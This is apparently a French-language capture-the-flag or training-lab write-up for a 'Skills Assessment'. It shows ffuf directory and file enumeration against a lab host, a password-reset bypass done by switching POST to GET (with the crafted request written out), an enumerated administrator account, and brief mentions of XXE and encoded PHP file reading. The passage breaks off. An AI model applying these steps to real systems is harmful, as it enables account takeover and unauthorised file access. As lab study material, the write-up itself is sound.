WriteUp - Skills Assessment

ffuf -u <http://83.136.249.223:31795/FUZZ> -w Downloads/SecLists/Discovery/Web-Content/raft-large-directories.txt

images                  [Status: 301, Size: 326, Words: 20, Lines: 10, Duration: 13ms]
server-status           [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]

ffuf -u <http://83.136.249.223:31795/FUZZ> -w Downloads/SecLists/Discovery/Web-Content/raft-large-files.txt 

index.php               [Status: 200, Size: 2386, Words: 418, Lines: 56, Duration: 13ms]
config.php              [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 10ms]
.htaccess               [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
style.css               [Status: 200, Size: 4325, Words: 480, Lines: 247, Duration: 11ms]
api.php                 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 12ms]
.                       [Status: 200, Size: 2386, Words: 418, Lines: 56, Duration: 13ms]
settings.php            [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 12ms]
.html                   [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 12ms]
.php                    [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htpasswd               [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htm                    [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.htpasswds          
    [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]
profile.php             [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 1180ms]
event.php               [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 19ms]
reset.php               [Status: 200, Size: 18, Words: 2, Lines: 1, Duration: 13ms]
.htgroup                [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 12ms]
wp-forum.phps           [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 9ms]
.htaccess.bak           [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htuser                 [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 10ms]
.ht                     [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htc                    [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htacess                [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
.htaccess.old           [Status: 403, Size: 282, Words: 20, Lines: 10, Duration: 11ms]
addEvent.php            [Status: 301, Size: 0, Words: 1, Lines: 1, Duration: 10ms]
:: Progress: [37050/37050] :: Job [1/1] :: 3448 req/sec :: Duration: [0:00:13] :: Errors: 0 ::

On peut modifier n’import quel pass en changeant le POST en GET, il faut changer les parametres egalements pour les passer en GET:

GET /reset.php?uid=75&password=Academy_student!&token=e51a8a3c-17ac-11ec-8e68-7fe51c0c175e

En énumérant les users on trouve:

{'uid': '52', 'username': 'a.corrales', 'full_name': 'Amor Corrales', 'company': 'Administrator'}

On peut ensuite créer des events, et on a une XXE:

On a une XXE avec:

Les requetes XXE semblent bloquées.

Mais la lecture de fichier PHP fonctionne avec encodage: